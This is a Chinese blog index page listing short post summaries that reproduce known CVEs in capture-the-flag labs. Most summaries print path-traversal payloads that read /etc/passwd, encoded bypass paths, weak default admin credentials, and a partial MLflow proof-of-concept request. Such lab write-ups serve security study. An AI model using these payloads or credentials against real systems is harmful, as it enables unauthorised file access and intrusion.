大雪深埋

2026年2月18日

CVE-2019-5418

摘要： CVE-2019-5418复现使用bp抓包/robots目录，传入Accept: ../../../../../../../../etc/passwd{{ 查看flag 阅读全文

posted @ 2026-02-18 01:14 大雪深埋阅读(2) 评论(0) 推荐(0)

CVE-2019-11515

摘要： CVE-2019-11515复现打开网站，访问/admin目录使用弱密码admin@admin.com/admin 登录,用户名邮箱是题目给的使用admin/db_backup?download=/etc/passwd来下载敏感数据下载flag,要加../,应该是在根目录的原因 admin/ 阅读全文

posted @ 2026-02-18 00:10 大雪深埋阅读(2) 评论(0) 推荐(0)

2026年2月17日

CVE-2018-3760

摘要： CVE-2018-3760复现打开网站访问/assets/file:%2f%2f/etc/passwd 通过报错的提示，选择一个可以访问的路径 /assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%25 阅读全文

posted @ 2026-02-17 23:52 大雪深埋阅读(3) 评论(0) 推荐(0)

2026年2月15日

CVE-2020-11738

摘要： CVE-2020-11738复现使用/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../etc/passwd 发现可以下载文件下载flag 阅读全文

posted @ 2026-02-15 14:27 大雪深埋阅读(3) 评论(0) 推荐(0)

CVE-2018-16299

摘要： CVE-2018-16299复现使用payloadwp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd 查看flag 阅读全文

posted @ 2026-02-15 14:13 大雪深埋阅读(2) 评论(0) 推荐(0)

CVE-2020-5405

摘要： CVE-2020-5405复现使用/1/1/(_)..(_)..(_)/etc/passwd绕过查看flag 阅读全文

posted @ 2026-02-15 14:09 大雪深埋阅读(2) 评论(0) 推荐(0)

CVE-2021-46203

摘要： CVE-2021-46203复现进入网站进入管理员目录/admin 弱口令admin/tao进入后台,在文件管理里面进入根目录下载flag 阅读全文

posted @ 2026-02-15 13:47 大雪深埋阅读(3) 评论(0) 推荐(0)

CVE-2023-29962

摘要： CVE-2023-29962复现扫描目录，发现admin目录使用弱密码admin/admin123进入后台在网站安全下的文件管理里面发现flag 查看flag 阅读全文

posted @ 2026-02-15 05:44 大雪深埋阅读(3) 评论(0) 推荐(0)

CVE-2023-1177

摘要： CVE-2023-1177复现进入网站使用bp抓包，构造poc POST /ajax-api/2.0/mlflow/registered-models/create Content-Type: application/json {"name": "testfile"} 构造要查看的文件的poc 阅读全文

posted @ 2026-02-15 05:34 大雪深埋阅读(5) 评论(0) 推荐(0)

CVE-2021-28164

摘要： CVE-2021-28164复现直接访问WEB-INF/flag发现会报错使用/%2e/WEB-INF/flag绕过阅读全文

posted @ 2026-02-15 05:15 大雪深埋阅读(2) 评论(0) 推荐(0)

公告